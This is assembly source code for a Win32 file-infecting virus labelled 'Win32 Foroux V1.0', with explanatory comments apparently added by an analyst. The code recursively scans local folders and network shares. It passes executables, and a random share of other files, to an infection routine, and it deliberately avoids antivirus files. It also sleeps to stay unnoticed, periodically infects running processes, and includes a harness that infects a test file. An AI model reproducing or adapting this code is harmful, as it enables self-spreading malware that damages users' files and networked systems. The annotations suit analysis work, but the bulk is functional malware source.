
;Sleep 20 minutes
push large 60
pop edi
main_thread_wait:
call goto_enum_proc
push large 20*1000
call [ebp+addrSleep-main_thread_ip]
dec edi
jnz short main_thread_wait

jmp short infect_all_driver

db 'Win32 Foroux V1.0'


;-----------------------------------------------------------------------
; enum_path -- recursively walk one directory tree and hand candidate
; files to file_operate (the infection routine; defined elsewhere).
;
; Calling convention (non-standard): the caller copies a NUL-terminated
; directory path (MAX_DIR_SIZE bytes) onto the stack directly below the
; return address, so the path *itself* is the stack argument, not a
; pointer.  ebp must hold enum_path_ip (== main_thread_ip) so that the
; [ebp+addr*-enum_path_ip] import slots and pathname_buf resolve.
; All registers are preserved (pushad/popad); flags are clobbered.
;
; Stack map while a search is open:
;   esp                                -> FindFirstFile handle
;   esp+4                              -> WIN32_FIND_DATA
;   esp+4+8*4+size WIN32_FIND_DATA     -> return address
;   esp+4+8*4+size WIN32_FIND_DATA+4   -> find path (the caller's copy)
;
; Selection rules implemented below:
;   * entries with OFFLINE/REPARSE_POINT/SPARSE/TEMPORARY attributes are
;     skipped (presumably to avoid junction loops and HSM recalls);
;   * "." and ".." are skipped -- loosely, see the note at that test;
;   * directories whose path contains "rary Inter" (Temporary Internet
;     Files) or "tem32\dllcac" (system32\dllcache) are not descended;
;   * files whose first four name bytes match the av_name table, or whose
;     first three are "avp"/"nav", are left alone;
;   * ".exe"/".scr" files are always passed to file_operate, any other
;     file only when the low two bits of callsub_seed are zero (~1/4).
;
; NOTE(analysis): recursion depth is bounded only by the directory tree;
; each level consumes MAX_DIR_SIZE + size WIN32_FIND_DATA + 40 bytes of
; stack and no explicit depth or path-length check is visible here.
;-----------------------------------------------------------------------
enum_path:
enum_path_ip equ main_thread_ip
pushad
lea esi,[esp+4+4*8] ;esi->caller's path copy (past 8 saved regs + return address)
call copy_path ;pathname_buf = path; edi->pathname_buf

call find_str_tail ;edi->terminating NUL of pathname_buf

;Append the search pattern.  MASM stores the last literal character in
;the low byte, so memory order is '\','*','.','*' (or '\','*','.','1').
if DEBUG
mov eax,'*.1\'
else
mov eax,'*.*\'
endif

stosd ;pathname_buf += "\*.*"
xor eax,eax
stosd ;NUL terminator (plus padding)

sub esp,size WIN32_FIND_DATA ;local WIN32_FIND_DATA
lea esi,[ebp+pathname_buf-enum_path_ip]
push esp ;lpFindFileData
push esi ;lpFileName = pathname_buf
call [ebp+addrFindFirstFileA-enum_path_ip]
inc eax ;INVALID_HANDLE_VALUE (-1) -> 0
jz enum_path_ok ;nothing to enumerate (or bad path)
dec eax
push eax ;[esp] = find handle, kept for FindNextFile/FindClose

found_one_file:
;Skip offline/reparse/sparse/temporary entries (dwFileAttributes is at offset 0).
test dword ptr [esp+4+0],FILE_ATTRIBUTE_OFFLINE or FILE_ATTRIBUTE_REPARSE_POINT or FILE_ATTRIBUTE_SPARSE_FILE or FILE_ATTRIBUTE_TEMPORARY ;dwFileAttributes
jnz enum_next_file_jmp1

;Rebuild pathname_buf = <path> + "\" + cFileName.
lea esi,[esp+4+size WIN32_FIND_DATA+4+4*8] ;esi->caller's path copy (handle + find data + ret addr + regs)
call copy_path ;edi->pathname_buf
push edi
call find_str_tail
mov ecx,MAX_PATH ;cFileName is MAX_PATH bytes; copy it whole
mov al,'\'
stosb
lea esi,[esp+4+4+2ch] ;esi->WIN32_FIND_DATA.cFileName (offset 2ch; +4 for the pushed edi)
mov eax,[esi] ;eax = first four bytes of the file name (used by the tests below)
rep movsb
pop esi ;esi->pathname_buf (full path of this entry)

;Check whether the file name is '.' or '..'
;NOTE(analysis): the checks are bit-pattern tests, not byte compares.
;After NOT, ZF is set iff each tested byte had ALL bits of 2eh set, and
;bytes 3-4 are never examined.  So besides "." and ".." this also skips
;any name whose first byte is e.g. '/', 'n', 'o', 'N', 'O' or '~'
;(6eh, 6fh, 4eh, 4fh, 7eh all contain 2eh), e.g. "notepad.exe".
not eax
test eax,00002e2eh ;is '..'?  (first two bytes both "contain" 2eh)
jz short enum_next_file_jmpz
test ax,002eh ;is '.'?  (first byte "contains" 2eh)
jz short enum_next_file_jmp1

test dword ptr [esp+4+0],FILE_ATTRIBUTE_DIRECTORY
jz short enum_do_fop ;plain file -> infection checks

;Directory: do not descend into "Temporary Internet Files" (too many
;uninfectable html files, per the author) nor into system32\dllcache.
;The call/pop idiom yields edi -> the inline substring.
call enum_path_1
db 'rary Inter',0
enum_path_1:
pop edi ;edi->"rary Inter"
mov ebx,esi ;ebx->full path (str_instr input)
push esi ;ESI must be protected because SUBCALL will destroy it.
SUBCALL str_instr,enum_path_ip ;ZF set if the substring is in the path
pop esi
jz short enum_next_file_jmpz
;Don't infect files in dllcache (is_in_dllcache reads the path from ebx)
push esi
SUBCALL is_in_dllcache,enum_path_ip ;ZF set if path contains "tem32\dllcac"
pop esi
enum_next_file_jmpz:
jz short enum_next_file

;Recurse: copy MAX_DIR_SIZE bytes of pathname_buf onto the stack as the
;argument frame for the nested enum_path.  If the assembled path is longer
;than MAX_DIR_SIZE-1 bytes the copy is truncated without a terminator
;(no length check is visible here).
mov ecx,MAX_DIR_SIZE
sub esp,ecx
mov edi,esp
rep movsb
call enum_path ;recursion infect path
add esp,MAX_DIR_SIZE ;clear stack frame
enum_next_file_jmp1:
jmp short enum_next_file

enum_do_fop:

;Check AV file: skip files whose (lower-cased) first four name bytes
;match an av_name entry, or whose first three bytes are "avp" or "nav".
not eax ;undo the NOT above -> first four bytes of cFileName
call eax_to_lowcase
lea edi,[ebp+av_name-enum_path_ip]
push large av_name_num
pop ecx
repnz scasd ;ZF set on an exact 4-byte match
jz short enum_next_file_jmp1
and eax,00ffffffh ;keep the first three bytes only
cmp eax,'0pva' and 00ffffffh ;avp  (memory order "avp")
jz short enum_next_file_jmp1
cmp eax,'0van' and 00ffffffh ;nav  (memory order "nav")
jz short enum_next_file_jmp1

mov edi,esi ;edi->full path
;For quick and quiet infection,I'd better check the file extension
;But for infect widely,I have 1/4 chance to infect any file without check its extension.
call find_str_tail
mov eax,[edi-4] ;eax = last four bytes before the NUL (the ".ext")
call eax_to_lowcase
cmp eax,'exe.' ;".exe"
jz short enum_do_fop_1
cmp eax,'rcs.' ;".scr"
jz short enum_do_fop_1
;Other extension: proceed only when the low two bits of the random
;seed (callsub_seed, written by get_rand) are both zero.
test byte ptr [ebp+callsub_seed-enum_path_ip],3
enum_next_file_jmpnz:
jnz short enum_next_file

enum_do_fop_1:
mov edi,esi ;file_operate takes edi->full path (see the host stub)
SUBCALL file_operate,enum_path_ip

enum_next_file:
call have_a_sleep ;throttle: may Sleep() and run the process scan

lea eax,[esp+4] ;WIN32_FIND_DATA
mov ecx,[esp] ;find file handle
push eax ;lpFindFileData
push ecx ;hFindFile
call [ebp+addrFindNextFileA-enum_path_ip]
or eax,eax
jnz found_one_file ;more entries

infect_one_path_close:
;Now esp->find file handle: it doubles as the stdcall argument, so the
;callee's ret 4 pops it.
call [ebp+addrFindClose-enum_path_ip]

enum_path_ok:
add esp,size WIN32_FIND_DATA ;clear stack frame
popad
retn
enum_path_end:

;-----------------------------------------------------------------------
; av_name -- table of 4-byte file-name prefixes that enum_path refuses
; to touch.  Each dd is written in reverse so that memory order (the
; string as seen in cFileName, lower-cased) is the one in the comment.
; Compared with repnz scasd against the first four bytes of the name.
; The three-byte prefixes "avp" and "nav" are handled separately in
; enum_path, not here.
;-----------------------------------------------------------------------
av_name equ this dword
dd 'pva_' ;_avp
dd 'rela' ;aler
dd 'noma' ;amon
dd 'itna' ;anti
dd '3don' ;nod3
dd 'sspn' ;npss
dd 'sern' ;nres
dd 'hcsn' ;nsch
dd 's23n' ;n32s
dd 'iwva' ;avwi
dd 'nacs' ;scan
dd 'ts-f' ;f-st
dd 'rp-f' ;f-pr
av_name_num equ ($-av_name)/4 ;number of entries (used as the scasd count)

;-----------------------------------------------------------------------
; enum_net -- enumerate network disk resources (WNetOpenEnumA /
; WNetEnumResourceA) and run enum_path over every non-container remote
; name; containers are recursed into with a nested enum_net.
;
; In:   eax = lpNetResource for WNetOpenEnumA (a NETRESOURCE of the
;             parent container on recursion; what the top-level caller
;             passes is not visible here)
;       ebp = enum_net_ip (== main_thread_ip) for the import slots
; Out:  nothing; all registers preserved, flags clobbered.
; Every WNet* import is checked for NULL before use (jecxz), so the
; routine is a no-op if mpr.dll could not be resolved.
;
; NOTE(analysis): WNetEnumResourceA is called exactly once per handle;
; ERROR_MORE_DATA is treated as failure, so at most MAX_NETRESOURCE_NUM
; entries per container are ever examined.
;-----------------------------------------------------------------------
enum_net:
enum_net_ip equ main_thread_ip
pushad
;Reserve the frame one page at a time, touching each page (push/pop)
;so the stack guard page is committed in order -- a hand-rolled
;__chkstk for a frame that may exceed 4 KiB.
mov ebx,4*3+MAX_NETRESOURCE_NUM*8*4-4 ;frame size minus the 'push 0' below
mov ecx,1000h
probpage_loop:
sub ebx,ecx
jb short probpage_end ;less than a page left
sub esp,ecx
push ecx ;touch the new page
pop ecx
jmp short probpage_loop
probpage_end:
add ebx,ecx ;remainder (< 1000h)
sub esp,ebx

;Stack map
;esp->enumeration handle
;esp+4->number of entries=-1
;esp+8->buffer size=MAX_NETRESOURCE_NUM*8*4
;esp+0ch->buffer (array of NETRESOURCE, 8 dwords each)

push large 0 ;enumeration handle slot (also the value popped at enum_net_ret)
mov ecx,[ebp+addrWNetOpenEnumA-enum_net_ip]
jecxz enum_net_ret_jmp ;import missing -> leave (chained jecxz below)
push esp ;lphEnum
push eax ;lpNetResource (caller-supplied)
push large RESOURCEUSAGE_ALL
push large RESOURCETYPE_DISK
push large RESOURCE_GLOBALNET
call ecx
or eax,eax
jnz short enum_net_ret_jmpnz ;non-zero = error

mov ecx,[ebp+addrWNetEnumResourceA-enum_net_ip]
enum_net_ret_jmp:
jecxz enum_net_ret_jmp2 ;import missing (or arrived here from the first jecxz)
mov esi,[esp] ;esi=enumeration handle
lea edi,[esp+8] ;edi->buffer size
mov dword ptr [edi],MAX_NETRESOURCE_NUM*8*4
push edi ;lpBufferSize
lea edi,[esp+0ch+4] ;edi->buffer (one push so far)
push edi ;lpBuffer
lea edi,[esp+4+4*2] ;edi->number of entries (two pushes so far)
dec eax ;eax was 0 (NO_ERROR) -> -1 = "as many as fit"
mov dword ptr [edi],eax
push edi ;lpcCount
push esi ;hEnum
call ecx
or eax,eax
enum_net_ret_jmpnz:
jnz short enum_net_ret ;error (including ERROR_MORE_DATA)
mov ecx,[edi] ;ecx = number of entries returned
enum_net_ret_jmp2:
jecxz enum_net_ret ;none
enum_net_loop:
;Walk the entries from last to first: entry index ecx-1 lives at
;esp+0ch+(ecx-1)*32; edx*8 == ecx*32.
lea edx,[ecx*4]
test dword ptr [esp+edx*8+0ch-8*4+4*3],RESOURCEUSAGE_CONTAINER ;dwUsage is RESOURCEUSAGE_CONTAINER?
jz short not_container ;no

lea eax,[esp+edx*8-8*4+0ch] ;eax->this NETRESOURCE, the child's lpNetResource
call enum_net ;recurse infect the container
jmp short enum_net_loop_next

not_container:
mov esi,[esp+edx*8+0ch-8*4+4*5] ;esi=lpRemoteName
or esi,esi
jz short enum_net_loop_next ;no remote name

;Skip remote names ending in "\a" or "\b" (floppy shares, per the
;author).  eax holds the last two characters plus the NUL.
mov edi,esi
call find_str_tail
mov eax,[edi-2]
call eax_to_lowcase
and eax,00ffffffh
cmp eax,'00a\' and 0000ffffh ;is '\a'?If so,maybe floppy,don't infect it
jz short enum_net_loop_next
cmp eax,'00b\' and 0000ffffh ;is '\b'?If so,maybe floppy,don't infect it
jz short enum_net_loop_next

;Build the stack-argument frame for enum_path (see enum_path's header).
;NOTE(analysis): the copy loop below is unbounded; a remote name longer
;than MAX_DIR_SIZE-1 bytes would overrun this frame.
sub esp,MAX_DIR_SIZE
mov edi,esp

;OUTSTRING3 esi,enum_net_ip
enum_net_1:
lodsb
stosb
or al,al
jnz short enum_net_1 ;copy remote name
call enum_path ;walk the share
add esp,MAX_DIR_SIZE

enum_net_loop_next:
loop enum_net_loop

enum_net_ret:
;esp->enumeration handle (0 if WNetOpenEnumA was never called or failed)
pop eax
mov ecx,[ebp+addrWNetCloseEnum-enum_net_ip]
jecxz enum_net_ret_1 ;import missing
or eax,eax
jz enum_net_ret_1 ;nothing to close
push eax ;hEnum
call ecx
enum_net_ret_1:
add esp,4*3+MAX_NETRESOURCE_NUM*8*4-4 ;release the probed frame
popad
ret
enum_net_end:


;-----------------------------------------------------------------------
; goto_enum_proc -- rate-limited wrapper around enum_proc (the process
; infection pass, defined elsewhere): runs it at most once per minute.
;
; Self-locating (call/pop ebp); preserves all registers and flags.
; The "last run" timestamp is the immediate operand of the mov below
; (goto_enum_proc_pretime), patched in place -- the code image must be
; writable for this to work.
;-----------------------------------------------------------------------
goto_enum_proc:
pushad
pushfd
call goto_enum_proc_ip
goto_enum_proc_ip:
pop ebp
;Can't infect process too frequently,if so,some program will corrupt when they start.
call [ebp+addrGetTickCount-goto_enum_proc_ip]
mov ebx,12345678h ;placeholder, overwritten with the last-run tick count
goto_enum_proc_pretime equ $-4
mov ecx,eax
sub ecx,ebx ;ecx = ms since last run (wraps correctly with unsigned compare)
cmp ecx,1000*60 ;Only more than every one minute to infect process
jc short goto_enum_proc_1 ;less than 60 s -> skip
mov [ebp+goto_enum_proc_pretime-goto_enum_proc_ip],eax ;remember this run


SUBCALL enum_proc,goto_enum_proc_ip

goto_enum_proc_1:
popfd
popad
retn


;-----------------------------------------------------------------------
; have_a_sleep -- throttle the file walk: after a burst of activity,
; Sleep() for a while, then refresh the quick-sleep flag and run the
; periodic process pass.  Called once per directory entry by enum_path.
;
; Timing (all derived from GetTickCount):
;   quick_sleep == 0 : run for 500 ms, then Sleep 50*1024 ms (~51 s)
;   quick_sleep != 0 : run for 3000 ms, then Sleep 20*1024 ms (~20 s)
; The "last sleep" timestamp is the patched immediate at
; have_a_sleep_pretime.  Self-locating; all registers preserved, flags
; clobbered.  ebp is left at have_a_sleep_ip for test_quick_sleep.
;-----------------------------------------------------------------------
have_a_sleep:
pushad
call have_a_sleep_ip
have_a_sleep_ip:
pop ebp

mov edi,[ebp+addrGetTickCount-have_a_sleep_ip] ;edi = GetTickCount (called twice)

call edi
mov ebx,12345678h ;placeholder, patched with the tick count after the last sleep
have_a_sleep_pretime equ $-4
sub eax,ebx ;eax = ms active since the last sleep

mov ebx,500 ;If isn't quick sleep,continue run for 500 millisecond
push large 50 ;Sleep for ~50 seconds (50 << 10 ms)
pop esi

mov ecx,[ebp+quick_sleep-have_a_sleep_ip]
jecxz have_a_sleep_1 ;Not quick sleep

mov ebx,3000 ;If is quick sleep,continue run for 3000 millisecond
push large 20 ;Sleep for ~20 seconds (20 << 10 ms)
pop esi

have_a_sleep_1:
cmp eax,ebx
jc short have_a_sleep_ret ;burst not over yet

shl esi,10 ;seconds-ish -> milliseconds (x1024)
push esi
call [ebp+addrSleep-have_a_sleep_ip]

call edi
mov [ebp+have_a_sleep_pretime-have_a_sleep_ip],eax ;new burst starts now

call test_quick_sleep ;may set quick_sleep (uses ebp = have_a_sleep_ip)

call goto_enum_proc ;process pass, itself rate-limited to once a minute

have_a_sleep_ret:
popad
retn
have_a_sleep_end:


;-----------------------------------------------------------------------
; test_quick_sleep -- probe the named file mapping MUTEX_NAME.  If it
; already exists, just close it and leave quick_sleep alone.  If it does
; not, create it via create_mem_map (defined elsewhere; eax=1 on entry,
; meaning unknown from here) and, on success, switch to quick-sleep mode
; by storing the returned value in quick_sleep, then unmap it.
;
; In:  ebp = have_a_sleep_ip (caller's ebp; this routine does not relocate)
; Clobbers: eax, edi, and whatever SUBCALL/create_mem_map clobber.
; NOTE(analysis): quick_sleep receives the raw create_mem_map result
; (apparently a view address, since it is passed to UnmapViewOfFile);
; have_a_sleep only tests it for non-zero, so the stale value is harmless.
;-----------------------------------------------------------------------
test_quick_sleep:
test_qs_ip equ have_a_sleep_ip
call test_qs_1
db MUTEX_NAME
test_qs_1:
pop edi ;edi->MUTEX_NAME
push edi ;lpName
push large 0 ;bInheritHandle = FALSE
push large FILE_MAP_WRITE ;dwDesiredAccess
call [ebp+addrOpenFileMappingA-test_qs_ip]
or eax,eax
jz short test_qs_2 ;does not exist yet
push eax
call [ebp+addrCloseHandle-test_qs_ip] ;exists: close and keep current mode
retn
test_qs_2:
inc eax ;eax = 1 (input to create_mem_map)
SUBCALL create_mem_map,test_qs_ip ;ZF set = failed (per the jz below)
jz short test_qs_3
mov [ebp+quick_sleep-test_qs_ip],eax ;enable quick-sleep mode
push eax
call [ebp+addrUnmapViewOfFile-test_qs_ip]
test_qs_3:
retn
test_quick_sleep_end:


;-----------------------------------------------------------------------
; copy_path -- copy MAX_DIR_SIZE bytes (not a strcpy: always the full
; block, regardless of the terminator) from [esi] into pathname_buf.
; In:  esi->path, ebp->enum_path_ip
; Out: edi->pathname_buf; esi advanced by MAX_DIR_SIZE; ecx = 0
;-----------------------------------------------------------------------
copy_path:
;in--esi->path,ebp->enum_path_ip
;on return,edi->pathname_buf
mov ecx,MAX_DIR_SIZE
lea edi,[ebp+pathname_buf-enum_path_ip]
push edi
rep movsb
pop edi ;restore edi to the start of the buffer
ret

;-----------------------------------------------------------------------
; find_str_tail -- advance edi to the terminating NUL of the string.
; In:  edi->string        Out: edi->the NUL byte.  eax, ecx preserved.
; NOTE(analysis): "mov ch,0ffh" only sets bits 8-15 of the count, so the
; scan limit is at least 0FF00h bytes (more if the caller's ecx has other
; bits set) -- effectively unbounded for an unterminated buffer.
;-----------------------------------------------------------------------
find_str_tail:
;edi->string,on return,edi->0
push eax
push ecx
xor eax,eax ;al = 0, the byte to find
mov ch,0ffh ;loose upper bound for the scan
repnz scasb
dec edi ;scasb stopped one past the NUL
pop ecx
pop eax
ret

;-----------------------------------------------------------------------
; eax_to_lowcase -- ASCII-lower-case each of the four bytes of eax.
; Rotating by 8 four times brings al to every byte and leaves eax in its
; original byte order.  Only 'A'..'Z' are changed.  ecx and flags-other-
; than-the-result are not a concern to callers; ecx is preserved.
;-----------------------------------------------------------------------
eax_to_lowcase:
push ecx
push large 4
pop ecx ;four bytes
eax_to_lowcase_0:
cmp al,'A'
jc eax_to_lowcase_1 ;below 'A'
cmp al,'Z'
ja eax_to_lowcase_1 ;above 'Z'
add al,'a'-'A' ;to lower case
eax_to_lowcase_1:
ror eax,8 ;next byte into al
loop eax_to_lowcase_0
pop ecx
retn

main_thread_end:


;-----------------------------------------------------------------------
; str_instr -- case-insensitive substring search built on lstrcmpiA.
; In:  ebx->string to scan (MUST be writable: a byte is temporarily
;      overwritten with 0 and then restored), edi->substring
; Out: ZF set = substring found, ZF clear = not found (or lstrcmpiA
;      unresolved).  All registers preserved (pushad/popad).
;
; Method: for each offset, NUL-terminate the scanned string sub-length
; bytes in, call lstrcmpiA(substring, truncated string), restore the
; byte, advance one character.  Stops when fewer bytes than the
; substring remain.  NOTE(analysis): str_len is recomputed on both
; strings every iteration, so this is O(n^2) in the scanned length.
; The al=38h / eax=38h loads only ensure eax is non-zero (ZF clear) on
; the "not found" exits.
;-----------------------------------------------------------------------
;in--ebx->string,edi->sub string to find
;out--ZF set means is in string,ZF cleared means not in
CALLHEADER str_instr
str_instr:
pushad
call str_instr_ip
str_instr_ip:
pop ebp
cld
mov al,38h ;non-zero => "not found" if lstrcmpiA is missing
mov ebp,[ebp+addrlstrcmpiA-str_instr_ip] ;ebp = lstrcmpiA (ebp is free from here on)
or ebp,ebp
jz short str_instr_ret
dec ebx ;compensate for the inc at the loop head
str_instr_1:
inc ebx ;next start offset in the scanned string
call str_len
mov esi,ecx ;esi = sub string len  (edi->substring here)
xchg ebx,edi
call str_len ;ecx=remaining source string len
xchg ebx,edi
push large 38h
pop eax ;eax non-zero => ZF clear on the exhausted exit
cmp esi,ecx
ja short str_instr_ret ;remaining text shorter than the substring
mov dl,[ebx+esi] ;save the byte we are about to clobber
push edx
push ebx
mov byte ptr [ebx+esi],0 ;truncate the scanned string to sub-length
push ebx ;lpString2 = truncated scanned string
push edi ;lpString1 = substring
call ebp ;lstrcmpiA -> 0 if equal
or eax,eax
pop ebx
pop edx
mov [ebx+esi],dl ;restore the clobbered byte (pop/mov keep flags)
jnz short str_instr_1 ;no match at this offset
str_instr_ret:
or eax,eax ;ZF = (eax == 0) = found; popad leaves flags alone
popad
retn

;-----------------------------------------------------------------------
; str_len -- strlen.  In: edi->string.  Out: ecx = length.
; edi preserved; eax (al=0) clobbered.  Unbounded scan (ecx starts at -1).
;-----------------------------------------------------------------------
;in--edi->string
;out--ecx=string length
str_len:
push edi
xor al,al
xor ecx,ecx
dec ecx ;ecx = -1 (no limit)
repnz scasb
pop edi
not ecx ;bytes scanned including the NUL
dec ecx ;exclude the NUL
retn
str_len_end:

str_instr_end:


;-----------------------------------------------------------------------
; is_in_dllcache -- does the path contain "tem32\dllcac" (i.e. lies
; under system32\dllcache, the SFC copy store)?  Used by enum_path to
; leave that directory alone.  Thin wrapper over str_instr.
; In:  ebx->full path (writable; see str_instr)
; Out: ZF set = in dllcache, ZF clear = not.  Registers preserved.
;-----------------------------------------------------------------------
;in--ebx->full path
;out--ZF set is in,ZF cleared,not in
CALLHEADER is_in_dllcache
is_in_dllcache:
pushad
call is_in_dllcache_ip
is_in_dllcache_ip:
pop ebp
call is_in_dllcache_1
db 'tem32\dllcac',0
is_in_dllcache_1:
pop edi ;edi->"tem32\dllcac"
SUBCALL str_instr,is_in_dllcache_ip ;ZF from str_instr is the result
popad
retn
is_in_dllcache_end:

;-----------------------------------------------------------------------
; get_rand -- pseudo-random 32-bit value.
; Out: edx = random (written into the pushad frame's edx slot, [esp+5*4]);
;      callsub_seed (word) = low 16 bits of the same value.
; Other registers preserved.  Not cryptographic: the state is the
; patched immediate rand_seed, stirred with GetTickCount and esp, then
; run through 32 shift-and-conditional-xor steps with HASH16FACTOR
; (presumably a polynomial constant; its value is not visible here).
; Writes to its own code image (rand_seed), so the image must be writable.
;-----------------------------------------------------------------------
;Out--edx=random
CALLHEADER get_rand
get_rand:
pushad
call get_rand_ip
get_rand_ip:
pop ebp
call [ebp+addrGetTickCount-get_rand_ip]
mov ecx,12345678h ;placeholder, patched in place with the evolving seed
rand_seed equ $-4
add eax,ecx ;eax = ticks + seed
rol ecx,1
add ecx,esp ;stir in the stack address
add [ebp+rand_seed-get_rand_ip],ecx ;seed += rol(seed,1) + esp
push large 32
pop ecx
get_rand_1:
shr eax,1
jnc get_rand_2
xor eax,HASH16FACTOR ;LFSR-style feedback on the shifted-out bit
get_rand_2:
loop get_rand_1
mov [esp+5*4],eax ;pushad slot of edx -> returned in edx
mov [ebp+callsub_seed-get_rand_ip],ax ;low 16 bits feed the 1/4 infection roll in enum_path

popad
retn
get_rand_end:


;-----------------------------------------------------------------------
; get_extra_proc -- load the optional DLLs and resolve their imports:
; first sfc, then mpr (two-iteration loop, counter kept on the stack),
; then user32.  For each, LoadLibraryA is given a string that sits 8
; bytes before the corresponding *_hash_table, and search_api_addr
; (defined elsewhere) is run with edi->that table and ebx = module
; base - 10000h (the offset is evidently what search_api_addr expects;
; not visible here).  A DLL that fails to load is silently skipped, so
; the addr* slots it would fill stay as they were -- callers such as
; enum_net check those slots for zero.
; Registers preserved (pushad/popad).
;-----------------------------------------------------------------------
CALLHEADER get_extra_proc
get_extra_proc:
pushad

call get_extra_proc_ip
get_extra_proc_ip:
pop ebp
lea edi,[ebp+sfc_hash_table-8-get_extra_proc_ip] ;edi->"sfc" name (8 bytes before its table)
push large 1 ;loop counter: 1 -> sfc, 0 -> mpr
get_extra_proc_0:
push edi ;lpLibFileName
call [ebp+addrLoadLibraryA-get_extra_proc_ip]
or eax,eax
jz short get_extra_proc_1 ;not loadable: skip resolution
mov ebx,eax
sub ebx,10000h ;search_api_addr's base convention
SUBCALL search_api_addr,get_extra_proc_ip
get_extra_proc_1:
pop ecx
jecxz get_extra_proc_2 ;second pass done
dec ecx
push ecx
lea edi,[ebp+mpr_hash_table-8-get_extra_proc_ip] ;edi->"mpr" name
jmp short get_extra_proc_0
get_extra_proc_2:

call get_extra_proc_3
db 'user32',0
get_extra_proc_3:
call [ebp+addrLoadLibraryA-get_extra_proc_ip] ;the call/pop trick supplied "user32" as the argument
or eax,eax
jz short get_extra_proc_4
mov ebx,eax
sub ebx,10000h
lea edi,[ebp+user32_hash_table-8-get_extra_proc_ip]
SUBCALL search_api_addr,get_extra_proc_ip
get_extra_proc_4:

popad
retn
get_extra_proc_end:
;*******************************mainthrd.asm end*****************************

;code and initialized data end here
;vir_size = bytes that must be written into a host (code + initialized
;data); vir_mem_size (below) additionally covers the work buffers.
vir_size equ $-_start

;Uninitialized data (zero-filled here; lives only in memory after
;infection, not in the bytes copied into a host)
ftime db 3*8 dup(0) ;3 FILETIMEs (presumably the host's create/access/write times; set elsewhere)
is9x dd 0 ;platform flag, set elsewhere
quick_sleep dd 0 ;non-zero selects have_a_sleep's faster cadence (set by test_quick_sleep)
infbuffer db vir_size+10 dup(0) ;room for one copy of the virus body (used elsewhere)
pathname_buf db MAX_DIR_SIZE*2+100 dup(0) ;enum_path's working path: MAX_DIR_SIZE copy + "\" + MAX_PATH name
vbuffer db INFPROC_MAP_SIZE+100 dup(0) ;process-infection work buffer (used elsewhere)
snapbuf db 300 dup(0) ;snapshot buffer (used elsewhere)

if DEBUG
hexstr db 16 dup(0) ;scratch for DEBUG hex output
endif

vir_mem_size equ $-_start

;-----------------------------------------------------------------------
; host -- the author's stand-alone test harness (not part of the code
; copied into infected files).  It infects "dummyfile" through the
; normal file_operate path and then shows a message box.  A block that
; would open a process by hard-coded id and call inf_proc on it is left
; in but jumped over (dead code between "jmp over" and "over:").
; Entry state is established here rather than by the normal infection
; prologue: eax = vir_first_blk_size, ebx = vir_mem_size, ebp = _start_ip.
;-----------------------------------------------------------------------
host:
mov eax,0 ;no-op (leftover)

mov eax,vir_first_blk_size
mov ebx,vir_mem_size
mov ebp,offset _start_ip ;delta base the rest of the code expects

SUBCALL prepare_buffer,_start_ip

lea edi,dummyfile ;edi->path of the file to infect
SUBCALL file_operate,_start_ip

jmp over ;skip the process-infection experiment below
;--- dead code: OpenProcess(0FFFh, FALSE, 0FFFDB43Dh); inf_proc; CloseHandle ---
push large 0fffdb43dh ;dwProcessId (a fixed id from the author's machine, presumably)
push large 0 ;bInheritHandle
push large 0fffh ;dwDesiredAccess = all PROCESS_* specific rights
call [ebp+addrOpenProcess-_start_ip]
push eax ;saved for CloseHandle below
xchg eax,edi ;edi = process handle

mov ebx,400000h ;image base handed to inf_proc
SUBCALL inf_proc,_start_ip

call [ebp+addrCloseHandle-_start_ip] ;consumes the pushed handle

over:
;MessageBoxA(0, text, cap, 0): the call/ret trick pushes the address of
;the inline text as lpText.
push large 0 ;uType
push offset cap ;lpCaption (defined elsewhere)
call nxt
if DEBUG
db 'Game over',0
else
db 'Released!!!',0
endif
nxt:
push large 0 ;hWnd
call MessageBoxA

push large 0 ;uExitCode
call ExitProcess

end _start
